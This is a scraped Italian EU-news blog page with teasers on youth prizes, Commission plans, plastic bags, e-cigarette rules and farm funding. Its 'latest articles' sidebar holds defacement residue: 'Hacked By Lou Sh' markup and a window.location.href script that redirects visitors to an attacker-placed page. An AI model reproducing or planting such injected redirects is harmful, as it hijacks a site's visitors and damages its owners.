EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Novembre 2013
it

A partire dal 25 ottobre sono aperte le iscrizioni per prendere parte alla settima edizione del Premio europeo Carlo Magno. Se sei un giovane tra i 16 e i 30 anni con un progetto che promuova l’identità europea e l’integrazione non esitare a partecipare: è l’occasione giusta per mettersi in luce. In palio, oltre al riconoscimento internazionale, anche un premio in denaro e la possibilità di visitare le sedi dell’Europarlamento.

Favorire l’integrazione europea, incoraggiare la nascita di un sentimento comune di identità, far emergere e sviluppare una coscienza europea giovanile e proporre modelli di comportamento per tutti i cittadini all’interno dell’Unione Europea. Sono questi gli obiettivi del “Premio europeo Carlo (...)

it

Occupazione e crescita: sono questi le principali prerogative del nuovo piano di lavoro della Commissione per il 2014. L’Unione Europea si impegnerà e lavorerà per contrastare la disoccupazione giovanile, per aumentare la crescita in tutti gli Stati membri e infine per mettere in atto le proposte che sono ancora rimaste in sospeso.

Il 22 ottobre scorso la Commissione europea ha adottato e pubblicato il suo programma di lavoro per il prossimo anno. In un periodo economicamente difficile, gli sforzi dell’Europa si concentreranno maggiormente su temi quali l’occupazione e la crescita, in particolar modo ci si soffermerà (...)

it

La Commissione ha deciso di porre un freno a quello che con gli anni è diventato un problema di quasi insormontabile risoluzione. Analizzando alcuni dati, si nota come nel solo 2010 siano stati immessi nel mercato UE qualcosa come 98,6 miliardi di borse di plastica, le quali vengono riutilizzate molto di meno rispetto alle altre essendo meno resistenti. Come è noto, il problema principale riguarda lo smaltimento di queste, che possono rimanere nell'ambiente per addirittura centinaia di anni.

Può una semplice risorsa come un sacchetto di plastica diventare un problema enorme per un colosso come l’Unione europea? La risposta è sì. Oltre che dai numeri riportati in precedenza, l’importanza è data anche dai sempre più numerosi sacchetti che vengono prodotti ma non riutilizzati, essendo (...)

it

Spesso in giro si odono voci di giovani che lamentano una scarsa considerazione da parte delle istituzioni e nazionali e, soprattutto, europee. Quale migliore occasione allora se non "L'Evento europeo per i giovani", il quale motto recita "Idee per un'Europa migliore", per far sentire la propria voce? Tanti ragazzi di tutto il continente (si stimano già intorno ai cinquemila) si incontreranno a Strasburgo e cercheranno di avanzare nuove proposte, nuove considerazioni, atte a migliorare un sistema da molti considerato obsoleto e senza futuro, in quanto non prevede la partecipazione massiccia dei giovani, del futuro.

L’European Youth Event 2014 si preannuncia essere un’occasione imperdibile per coloro i quali vogliono sentirsi più partecipi della vita continentale. Numerosi autorevoli professori e vari decision makers saranno presenti nella tre giorni francese in programma a maggio 2014, pronti ad accogliere (...)

it

Nel corso della sessione plenaria dell’8 ottobre 2013, gli eurodeputati hanno approvato una proposta che si pone in contrasto con il disegno di legge avanzato dalla Commissione europea di far rientrare nella categoria dei medicinali anche le sigarette elettroniche. Le cifre parlano chiaro: circa 700 mila cittadini europei ogni anno muoiono per problemi che spesso sono legati al fumo. Le normative degli ultimi dieci anni, hanno inasprito ancora di più le leggi in materia, ma comunque rimane una sostanziosa fetta della popolazione giovanile europea, il 29 %, che continua a praticare questa insana attività.

La lobby del tabacco ha mosso severi rimproveri riguardo le proposte della Commissione europea e ha esercitato una forte pressione nei confronti dei deputati europei poco prima del voto. Così durante la votazione, i deputati europei sono stati disposti ad accettare norme più restrittive per ciò (...)

it

Il 6 e 7 novembre il Vicepresidente e Commissario europeo per l’industria e l’imprenditoria, Antonio Tajani, si è riunito a Parigi con gli esponenti più influenti del settore moda e dei prodotti d’alta gamma, per favorire lo sviluppo di un piano d’azione. Tra le associazioni partecipanti l'Union Française des Industries de l'Habillement, l'Union des Industries Textiles, la Fédération Française de la Chaussure, l'Union des Fabricants e l'Institut Français de la Mode.

L’incontro di Parigi è stata l’occasione per costruire un fronte comune alla sfida che la moda si trova a dover prendere in esame e per pronosticare delle soluzioni concrete. Ma su cosa verte la sfida? Nel dibattito i temi sono molteplici: innanzitutto un miglioramento della politica industriale (...)

it

La Commissione europea ha analizzato e studiato a fondo vari programmi riguardanti l'agricoltura, scegliendone alla fine 22 (15 del mercato interno e 7 esterni) ai quali saranno destinati 35 milioni di euro. La maggior parte di essi ha durata triennale, il che vuol dire un impegno profondo per cambiare una situazione che per certi versi sembra aver raggiunto una fase di stallo.

I programmi che l’Ue ha ritenuto adatti allo stanziamento di questi fondi riguardano per la maggior parte prodotti di qualità con certificazioni IGP (Indicazione Geografica Protetta), DOP (Denominazione di Origine Protetta) e STG (Specialità Tradizionale Garantita). Gli alimenti più interessati (...)

it

La Pac, Politica agricola comune dell’Unione europea, nasce per sostenere gli agricoltori nella fornitura di beni primari che più di 500 milioni di persone utilizzano. Tra questi non mancano il pane, il latte, la carne, il vino e i vestiti. La produzione di essi è indispensabile che segua precise procedure non solo a livello quantitativo ma soprattutto qualitativo.

Tutto questo deve rientrare ovviamente nel progetto di salvaguardare l’ecosostenibilità e i cambiamenti climatici che sempre di più ci riguardano da vicino. La campagna di sensibilizzazione messa in campo dall’UE “Abbiamo a cuore le nostre radici” si prefissa l’obiettivo di aiutare e sostenere gli (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France